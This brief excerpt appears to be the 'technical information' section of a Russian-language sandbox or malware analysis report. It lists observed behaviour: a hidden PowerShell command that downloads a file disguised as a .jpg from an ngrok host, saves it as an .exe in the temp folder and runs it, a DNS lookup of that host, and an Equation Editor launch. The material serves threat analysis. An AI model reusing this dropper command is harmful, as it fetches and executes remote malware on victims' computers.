Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$D=$env:temp+'\JB.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'https://44648684.ngrok.io/nuw.jpg' -Destination $D;(New-Object -com Shell.Application).ShellExec...
- DNS ASK 44####84.ngrok.io
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$D=$env:temp+'\JB.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'https://44648684.ngrok.io/nuw.jpg' -Destination $D;(New-Object -com Shell.Application).ShellExec...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding